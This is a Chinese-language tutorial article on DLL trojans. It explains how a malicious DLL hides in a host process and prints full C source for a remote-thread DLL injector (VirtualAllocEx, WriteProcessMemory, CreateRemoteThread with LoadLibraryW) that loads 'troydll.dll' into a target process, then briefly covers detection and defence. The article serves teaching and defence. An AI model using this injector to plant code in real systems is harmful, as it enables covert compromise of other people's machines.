wrhwww

從前文可知，DLL在程序編制中可作出巨大貢獻，它提供了具共性代碼的復(fù)用能力。但是，正如一門高深的武學(xué)，若被掌握在正義之俠的手上，便可助其仗義江湖；但若被掌握在邪惡之徒的手上，則必然在江湖上掀起腥風(fēng)血雨。DLL正是一種這樣的武學(xué)。DLL一旦染上了魔性，就不再是正常的DLL程序，而是DLL木馬，一種惡貫滿盈的病毒，令特洛伊一夜之間國破家亡。

　　DLL木馬的原理

　　DLL木馬的實現(xiàn)原理是編程者在DLL中包含木馬程序代碼，隨后在目標主機中選擇特定目標進程，以某種方式強行指定該進程調(diào)用包含木馬程序的DLL，最終達到侵襲目標系統(tǒng)的目的。

　　正是DLL程序自身的特點決定了以這種形式加載木馬不僅可行，而且具有良好的隱藏性：

　　（1）DLL程序被映射到宿主進程的地址空間中，它能夠共享宿主進程的資源，并根據(jù)宿主進程在目標主機的級別非法訪問相應(yīng)的系統(tǒng)資源；

　?。?）DLL程序沒有獨立的進程地址空間，從而可以避免在目標主機中留下"蛛絲馬跡"，達到隱蔽自身的目的。

　　DLL木馬實現(xiàn)了"真隱藏"，我們在任務(wù)管理器中看不到木馬"進程"，它完全溶進了系統(tǒng)的內(nèi)核。與"真隱藏"對應(yīng)的是"假隱藏"，"假隱藏"木馬把自己注冊成為一個服務(wù)。雖然在任務(wù)管理器中也看不到這個進程，但是"假隱藏"木馬本質(zhì)上還具備獨立的進程空間。"假隱藏"只適用于Windows9x的系統(tǒng)，對于基于WINNT的操作系統(tǒng)，通過服務(wù)管理器，我們可以發(fā)現(xiàn)系統(tǒng)中注冊過的服務(wù)。

　　DLL木馬注入其它進程的方法為遠程線程插入。

　　遠程線程插入技術(shù)指的是通過在另一個進程中創(chuàng)建遠程線程的方法進入那個進程的內(nèi)存地址空間。將木馬程序以DLL的形式實現(xiàn)后，需要使用插入到目標進程中的遠程線程將該木馬DLL插入到目標進程的地址空間，即利用該線程通過調(diào)用Windows API LoadLibrary函數(shù)來加載木馬DLL，從而實現(xiàn)木馬對系統(tǒng)的侵害。

　　DLL木馬注入程序

　　這里涉及到一個非常重要的Windows API――CreateRemoteThread。與之相比，我們所習(xí)慣使用的CreateThread API函數(shù)只能在進程自身內(nèi)部產(chǎn)生一個新的線程，而且被創(chuàng)建的新線程與主線程共享地址空間和其他資源。而CreateRemoteThread則不同，它可以在另外的進程中產(chǎn)生線程！CreateRemoteThread有如下特點：

　?。?）CreateRemoteThread較CreateThread多一個參數(shù)hProcess，該參數(shù)用于指定要創(chuàng)建線程的遠程進程，其函數(shù)原型為：

HANDLE CreateRemoteThread( 　HANDLE hProcess, //遠程進程句柄 　LPSECURITY_ATTRIBUTES lpThreadAttributes, 　SIZE_T dwStackSize, 　LPTHREAD_START_ROUTINE lpStartAddress, 　LPVOID lpParameter, 　DWORD dwCreationFlags, 　LPDWORD lpThreadId );

　　（2）線程函數(shù)的代碼不能位于我們用來注入DLL木馬的進程所在的地址空間中。也就是說，我們不能想當(dāng)然地自己寫一個函數(shù)，并把這個函數(shù)作為遠程線程的入口函數(shù)；

　　（3）不能把本進程的指針作為CreateRemoteThread的參數(shù)，因為本進程的內(nèi)存空間與遠程進程的不一樣。
以下程序由作者Shotgun的DLL木馬注入程序簡化而得（單擊此處下載，在經(jīng)典書籍《Windows核心編程》中我們也可以看到類似的例子），它將d盤根目錄下的troydll.dll插入到ID為4000的進程中：

#include <windows.h> #include <stdlib.h> #include <stdio.h> void CheckError ( int, int, char *); //出錯處理函數(shù) PDWORD pdwThreadId; HANDLE hRemoteThread, hRemoteProcess; DWORD fdwCreate, dwStackSize, dwRemoteProcessId; PWSTR pszLibFileRemote=NULL; void main(int argc,char **argv) { 　int iReturnCode; 　char lpDllFullPathName[MAX_PATH]; 　WCHAR pszLibFileName[MAX_PATH]={0}; 　dwRemoteProcessId = 4000; 　strcpy(lpDllFullPathName, "d:\\troydll.dll"); 　//將DLL文件全路徑的ANSI碼轉(zhuǎn)換成UNICODE碼 　iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS, 　　lpDllFullPathName, strlen(lpDllFullPathName), 　　pszLibFileName, MAX_PATH); 　CheckError(iReturnCode, 0, "MultByteToWideChar"); 　//打開遠程進程 　hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允許創(chuàng)建線程 　　PROCESS_VM_OPERATION | //允許VM操作 　　PROCESS_VM_WRITE, //允許VM寫 　　FALSE, dwRemoteProcessId ); 　CheckError( (int) hRemoteProcess, NULL, "Remote Process not Exist or Access Denied!"); 　//計算DLL路徑名需要的內(nèi)存空間 　int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR); 　pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE); 　CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx"); 　//將DLL的路徑名復(fù)制到遠程進程的內(nèi)存空間 　iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL); 　CheckError(iReturnCode, false, "WriteProcessMemory"); 　//計算LoadLibraryW的入口地址 　PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE) 　　　GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW"); 　CheckError((int)pfnStartAddr, NULL, "GetProcAddress"); 　//啟動遠程線程，通過遠程線程調(diào)用用戶的DLL文件 　hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL); 　CheckError((int)hRemoteThread, NULL, "Create Remote Thread"); 　//等待遠程線程退出 　WaitForSingleObject(hRemoteThread, INFINITE); 　//清場處理 　if (pszLibFileRemote != NULL) 　{ 　　VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE); 　} 　if (hRemoteThread != NULL) 　{ 　　CloseHandle(hRemoteThread ); 　} 　if (hRemoteProcess!= NULL) 　{ 　　CloseHandle(hRemoteProcess); 　} } //錯誤處理函數(shù)CheckError() void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg) { 　if(iReturnCode==iErrorCode) 　{ 　　printf("%s Error:%d\n\n", pErrorMsg, GetLastError()); 　　//清場處理 　　if (pszLibFileRemote != NULL) 　　{ 　　　VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE); 　　} 　　if (hRemoteThread != NULL) 　　{ 　　　CloseHandle(hRemoteThread ); 　　} 　　if (hRemoteProcess!= NULL) 　　{ 　　　CloseHandle(hRemoteProcess); 　　} 　　exit(0); 　} }

　　從DLL木馬注入程序的源代碼中我們可以分析出DLL木馬注入的一般步驟為：

　?。?）取得宿主進程（即要注入木馬的進程）的進程ID dwRemoteProcessId；

　?。?）取得DLL的完全路徑，并將其轉(zhuǎn)換為寬字符模式pszLibFileName；

　?。?）利用Windows API OpenProcess打開宿主進程，應(yīng)該開啟下列選項：

　　a.PROCESS_CREATE_THREAD：允許在宿主進程中創(chuàng)建線程；

　　b.PROCESS_VM_OPERATION：允許對宿主進程中進行VM操作；

　　c.PROCESS_VM_WRITE：允許對宿主進程進行VM寫。

　?。?）利用Windows API VirtualAllocEx函數(shù)在遠程線程的VM中分配DLL完整路徑寬字符所需的存儲空間，并利用Windows API WriteProcessMemory函數(shù)將完整路徑寫入該存儲空間；

　?。?）利用Windows API GetProcAddress取得Kernel32模塊中LoadLibraryW函數(shù)的地址，這個函數(shù)將作為隨后將啟動的遠程線程的入口函數(shù)；

　　（6）利用Windows API CreateRemoteThread啟動遠程線程，將LoadLibraryW的地址作為遠程線程的入口函數(shù)地址，將宿主進程里被分配空間中存儲的完整DLL路徑作為線程入口函數(shù)的參數(shù)以另其啟動指定的DLL；

　?。?）清理現(xiàn)場。

　　DLL木馬的防治

　　從DLL木馬的原理和一個簡單的DLL木馬程序中我們學(xué)到了DLL木馬的工作方式，這可以幫助我們更好地理解DLL木馬病毒的防治手段。

　　一般的木馬被植入后要打開一網(wǎng)絡(luò)端口與攻擊程序通信，所以防火墻是抵御木馬攻擊的最好方法。防火墻可以進行數(shù)據(jù)包過濾檢查，我們可以讓防火墻對通訊端口進行限制，只允許系統(tǒng)接受幾個特定端口的數(shù)據(jù)請求。這樣，即使木馬植入成功，攻擊者也無法進入到受侵系統(tǒng)，防火墻把攻擊者和木馬分隔開來了。

　　對于DLL木馬，一種簡單的觀察方法也許可以幫助用戶發(fā)現(xiàn)之。我們查看運行進程所依賴的DLL，如果其中有一些莫名其妙的DLL，則可以斷言這個進程是宿主進程，系統(tǒng)被植入了DLL木馬。"道高一尺，魔高一丈"，現(xiàn)如今，DLL木馬也發(fā)展到了更高的境界，它們看起來也不再"莫名其妙"。在最新的一些木馬里面，開始采用了先進的DLL陷阱技術(shù)，編程者用特洛伊DLL替換已知的系統(tǒng)DLL。特洛伊DLL對所有的函數(shù)調(diào)用進行過濾，對于正常的調(diào)用，使用函數(shù)轉(zhuǎn)發(fā)器直接轉(zhuǎn)發(fā)給被替換的系統(tǒng)DLL；對于一些事先約定好的特殊情況，DLL會執(zhí)行一些相應(yīng)的操作。

　　本文給出的只是DLL木馬最簡單情況的介紹，讀者若有興趣深入研究，可以參考其它資料。